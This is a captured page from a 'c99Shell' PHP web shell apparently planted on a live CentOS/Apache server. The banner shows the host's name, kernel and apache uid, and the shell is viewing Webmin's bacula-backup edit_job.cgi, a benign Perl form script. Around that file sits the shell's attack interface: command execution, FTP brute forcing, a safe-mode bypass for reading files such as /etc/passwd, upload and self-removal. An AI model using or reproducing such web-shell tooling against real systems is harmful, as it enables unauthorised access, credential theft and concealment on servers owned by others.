!c99Shell v. 1.0 pre-release build #16!

Software: Apache/2.2.3 (CentOS). PHP/5.1.6 

uname -a: Linux mx-ll-110-164-51-230.static.3bb.co.th 2.6.18-194.el5PAE #1 SMP Fri Apr 2 15:37:44
EDT 2010 i686
 

uid=48(apache) gid=48(apache) groups=48(apache) 

Safe-mode: OFF (not secure)

/usr/libexec/webmin/bacula-backup/   drwxr-xr-x
Free 53.72 GB of 127.8 GB (42.03%)
Home    Back    Forward    UPDIR    Refresh    Search    Buffer    Encoder    Tools    Proc.    FTP brute    Sec.    SQL    PHP-code    Update    Feedback    Self remove    Logout    


Viewing file:     edit_job.cgi (5.34 KB)      -rwxr-xr-x
Select action/file-type:
(+) | (+) | (+) | Code (+) | Session (+) | (+) | SDB (+) | (+) | (+) | (+) | (+) | (+) |
#!/usr/bin/perl
# Show the details of one backup job

require './bacula-backup-lib.pl';
&ReadParse();
$conf = &get_director_config();
@jobs = ( &find("JobDefs", $conf), &find("Job", $conf) );
@clients = map { $n=&find_value("Name", $_->{'members'}) }
            grep { !&is_oc_object($_) } &find("Client", $conf);
@filesets = map { $n=&find_value("Name", $_->{'members'}) }
            &find("FileSet", $conf);
@schedules = map { $n=&find_value("Name", $_->{'members'}) }
            &find("Schedule", $conf);
@storages = map { $n=&find_value("Name", $_->{'members'}) }
            &find("Storage", $conf);
@pools = map { $n=&find_value("Name", $_->{'members'}) }
            &find("Pool", $conf);
@messages = map { $n=&find_value("Name", $_->{'members'}) }
            &find("Messages", $conf);
@defs = map { $n=&find_value("Name", $_->{'members'}) }
            &find("JobDefs", $conf);
if ($in{'new'}) {
    &ui_print_header(undef, $text{'job_title1'}, "");
    $mems = [ { 'name' => 'Type',
            'value' => 'Backup' },
          { 'name' => 'Level',
            'value' => 'Incremental' },
          { 'name' => 'Client',
            'value' => $clients[0] },
          { 'name' => 'FileSet',
            'value' => $filesets[0] },
          { 'name' => 'Schedule',
            'value' => $schedules[0] },
          { 'name' => 'Storage',
            'value' => $storages[0] },
          { 'name' => 'Messages',
            'value' => $messages[0] },
          { 'name' => 'Pool',
            'value' => $pools[0] },
        ];
    $job = { 'name' => 'Job',
         'members' => $mems };
    }
else {
    &ui_print_header(undef, $text{'job_title2'}, "");
    $job = &find_by("Name", $in{'name'}, \@jobs);
    $job || &error($text{'job_egone'});
    $mems = $job->{'members'};
    }

# Show details
print &ui_form_start("save_job.cgi", "post");
print &ui_hidden("new", $in{'new'}),"\n";
print &ui_hidden("old", $in{'name'}),"\n";
print &ui_table_start($text{'job_header'}, "width=100%", 4);

# Job name
print &ui_table_row($text{'job_name'},
    &ui_textbox("name", $name=&find_value("Name", $mems), 40), 3);

# Job enabled?
$enabled = &find_value("Enabled", $mems);
print &ui_table_row($text{'job_enabled'},
    &ui_yesno_radio("enabled", lc($enabled) ne 'no'));

# Default or source
$defs = &find_value("JobDefs", $mems);
$dmode = $defs ? 2 : $job->{'name'} eq 'Job' ? 1 : 0;
print &ui_table_row($text{'job_def'},
    &ui_radio("dmode", $dmode,
    [ [ 0, $text{'job_def0'} ],
      [ 1, $text{'job_def1'} ],
      [ 2, &text('job_def2', 
        &ui_select("defs", $defs, [ map { [ $_ ] } @defs ])) ] ]), 3);

# Job type
$type = &find_value("Type", $mems);
print &ui_table_row($text{'job_type'},
    &ui_select("type", $type,
        [ [ "", "<$text{'default'}>" ],
          [ "Backup" ], [ "Restore" ], [ "Verify" ], [ "Admin" ] ],
        1, 0, 1));

# Backup level
$level = &find_value("Level", $mems);
print &ui_table_row($text{'job_level'},
    &ui_select("level", $level,
        [ [ "", "<$text{'default'}>" ],
          map { [ $_ ] } @backup_levels ],
        1, 0, 1));

# Client being backed up
$client = &find_value("Client", $mems);
print &ui_table_row($text{'job_client'},
    &ui_select("client", $client,
        [ [ "", "<$text{'default'}>" ],
          map { [ $_ ] } @clients ], 1, 0, 1));

# Files to be backed up
$fileset = &find_value("FileSet", $mems);
print &ui_table_row($text{'job_fileset'},
    &ui_select("fileset", $fileset,
        [ [ "", "<$text{'default'}>" ],
          map { [ $_ ] } @filesets ], 1, 0, 1));

# Backup schedule
$schedule = &find_value("Schedule", $mems);
print &ui_table_row($text{'job_schedule'},
    &ui_select("schedule", $schedule,
        [ [ "", "<$text{'default'}>" ],
          map { [ $_ ] } @schedules ], 1, 0, 1));

# Storage device
$storage = &find_value("Storage", $mems);
print &ui_table_row($text{'job_storage'},
    &ui_select("storage", $storage,
        [ [ "", "<$text{'default'}>" ],
          map { [ $_ ] } @storages ], 1, 0, 1));

# Backup pool
$pool = &find_value("Pool", $mems);
print &ui_table_row($text{'job_pool'},
    &ui_select("pool", $pool,
        [ [ "", "<$text{'default'}>" ],
          map { [ $_ ] } @pools ], 1, 0, 1));

# Backup messages
$messages = &find_value("Messages", $mems);
print &ui_table_row($text{'job_messages'},
    &ui_select("messages", $messages,
        [ [ "", "<$text{'default'}>" ],
          map { [ $_ ] } @messages ], 1, 0, 1));

# Priority level
$priority = &find_value("Priority", $mems);
print &ui_table_row($text{'job_prority'},
    &ui_opt_textbox("priority", $priority, 4, $text{'default'}));

# Before and after commands
print &ui_table_hr();

$before = &find_value("Run Before Job", $mems);
print &ui_table_row($text{'job_before'},
    &ui_opt_textbox("before", $before, 60, $text{'default'}), 3);
$after = &find_value("Run After Job", $mems);
print &ui_table_row($text{'job_after'},
    &ui_opt_textbox("after", $after, 60, $text{'default'}), 3);

$cbefore = &find_value("Client Run Before Job", $mems);
print &ui_table_row($text{'job_cbefore'},
    &ui_opt_textbox("cbefore", $cbefore, 60, $text{'default'}), 3);
$cafter = &find_value("Client Run After Job", $mems);
print &ui_table_row($text{'job_cafter'},
    &ui_opt_textbox("cafter", $cafter, 60, $text{'default'}), 3);

# All done
print &ui_table_end();
if ($in{'new'}) {
    print &ui_form_end([ [ "create", $text{'create'} ] ]);
    }
else {
    ($bjob) = grep { $_->{'name'} eq $in{'name'} } &get_bacula_jobs();
    print &ui_form_end([ [ "save", $text{'save'} ],
                 ( $job->{'name'} eq 'Job' && $bjob ?
                ( [ "run", $text{'job_run'} ] ) : ( ) ),
                 [ "delete", $text{'delete'} ] ]);
    }
&ui_print_footer("list_jobs.cgi", $text{'jobs_return'});


:: Command execute ::

Enter:
 
Select:
 

:: Shadow's tricks :D ::

Useful Commands
 
Warning. Kernel may be alerted using higher levels
Kernel Info:

:: Preddy's tricks :D ::

Php Safe-Mode Bypass (Read Files)

File:

eg: /etc/passwd

Php Safe-Mode Bypass (List Directories):

Dir:

eg: /etc/

:: Search ::
  - regexp 

:: Upload ::
 
[ Read-Only ]

:: Make Dir ::
 
[ Read-Only ]
:: Make File ::
 
[ Read-Only ]

:: Go Dir ::
 
:: Go File ::
 

--[ c999shell v. 1.0 pre-release build #16 Modded by Shadow & Preddy | RootShell Security Group | r57 c99 shell | Generation time: 0.0108 ]--